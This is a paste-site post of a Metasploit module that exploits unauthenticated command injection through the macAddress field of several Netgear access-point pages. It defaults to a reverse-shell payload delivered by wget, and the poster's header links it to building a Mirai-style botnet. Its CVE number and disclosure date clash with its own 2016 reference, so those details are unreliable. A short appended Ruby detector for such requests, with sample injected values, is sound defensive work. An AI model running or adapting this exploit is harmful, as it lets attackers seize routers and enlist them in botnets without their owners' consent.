[NETGEAR RCE][METASPLOIT][7 FIRMWARE] 28/11/18

xB4ckdoorREAL Nov 28th, 2018 204 Never
## [WRITE YOURSELF IN PYTHON FOR M1R41, OR CONTACT ME. DISCORD: https://discord.gg/QDy3bUy OR skype: b4ckdoor.porn EDIT: TESTED AND #SHIT.
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Netgear Devices Unauthenticated Remote Command Execution',
      'Description' => %q{
        From the CVE-2018-2555 page: (1) boardData102.php, (2) boardData103.php,
        (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
        Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
        WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
        arbitrary commands.
      },
      'Author'      =>
        [
          'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2018-2555'],
        ],
      'DisclosureDate' => 'Nov 25 2018', # According to http://seclists.org/fulldisclosure/2016/Feb/112
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'Payload'        => {},
      'DefaultOptions' => {
        'CMDSTAGER::FLAVOR' => 'wget',
        'PAYLOAD'           => 'linux/mipsbe/shell_reverse_tcp',
        'WfsDelay'          => 10 },
      'Targets'        => [['Automatic', { }]],
      'CmdStagerFlavor'=> %w{ echo printf wget },
      'DefaultTarget'  => 0
      ))
      register_options(
      [
        OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php
        OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])
      ])
  end

  # check for vulnerability existence
  def check
    fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response
    res = execute_command("echo #{fingerprint}") # the raw POST response

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200
      return CheckCode::Safe
    end

    unless res.get_html_document.at('input').to_s.include? fingerprint
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # execute a command, or simply send a POST request
  def execute_command(cmd, opts = {})
    vars_post = {
      'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};",
      'reginfo' => '1',
      'writeData' => 'Submit'
    }

    send_request_cgi({
      'method'  => 'POST',
      'headers' => { 'Connection' => 'Keep-Alive' },
      'uri'     => normalize_uri(target_uri.path),
      'vars_post' => vars_post
    })
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
  end

  # the exploit method
  def exploit
    # run a check before attempting to exploit
    unless [CheckCode::Vulnerable].include? check
      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
    end

    execute_cmdstager(linemax: 2048) # maximum 130,000
  end

end

#[2018-11-28]
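
A detection-side check for the request shape that execute_command sends, added here as an example; it is not part of the original paste or of Metasploit. It flags POSTs to the five boardData pages whose macAddress field is not a plain MAC address. The accepted MAC format, the function names and the sample records are assumptions constructed for illustration.

```ruby
require 'uri'

# Endpoints listed in the module's description above.
BOARD_DATA_PATHS = %w[
  /boardData102.php /boardData103.php /boardDataJP.php
  /boardDataNA.php /boardDataWW.php
].freeze

# Assumption: a legitimate macAddress value is 12 hex digits, either
# bare or as six pairs separated by ':' or '-'. Anything else (';',
# backticks, spaces, extra text) is treated as an injection attempt.
VALID_MAC = /\A(?:\h{12}|\h{2}(?:[:-]\h{2}){5})\z/

# Returns a reason string when the request should be alerted on or
# blocked, nil when it is out of scope or carries a well-formed MAC.
def suspicious_board_data_post(method, path, body)
  return nil unless method.to_s.upcase == 'POST'
  return nil unless BOARD_DATA_PATHS.include?(path.to_s.split('?').first)

  mac = URI.decode_www_form(body.to_s).to_h['macAddress']
  return nil if mac.nil? || VALID_MAC.match?(mac)

  "macAddress is not a MAC address: #{mac.inspect}"
rescue ArgumentError
  # decode_www_form rejects non-ASCII input; an unparseable body sent
  # to these pages is worth an alert in its own right.
  'malformed form body'
end

# Constructed sample records (method, path, form body); not real traffic.
SAMPLE_REQUESTS = [
  ['POST', '/boardDataWW.php', 'macAddress=A1B2C3D4E5F6&reginfo=0&writeData=Submit'],
  ['POST', '/boardDataWW.php',
   'macAddress=A1B2C3D4E5F6%3Becho+marker%3B&reginfo=1&writeData=Submit'],
  ['GET',  '/boardDataWW.php', ''],
  ['POST', '/index.php', 'macAddress=x%3Bid%3B']
].freeze

# Returns [index, reason] pairs for every flagged record.
def flag_requests(records)
  records.each_with_index.filter_map do |(method, path, body), i|
    reason = suspicious_board_data_post(method, path, body)
    [i, reason] if reason
  end
end

puts flag_requests(SAMPLE_REQUESTS).inspect if __FILE__ == $PROGRAM_NAME
```

The same allow-list test works as a reverse-proxy or WAF rule in front of devices that cannot be upgraded past the fixed firmware versions named in the description.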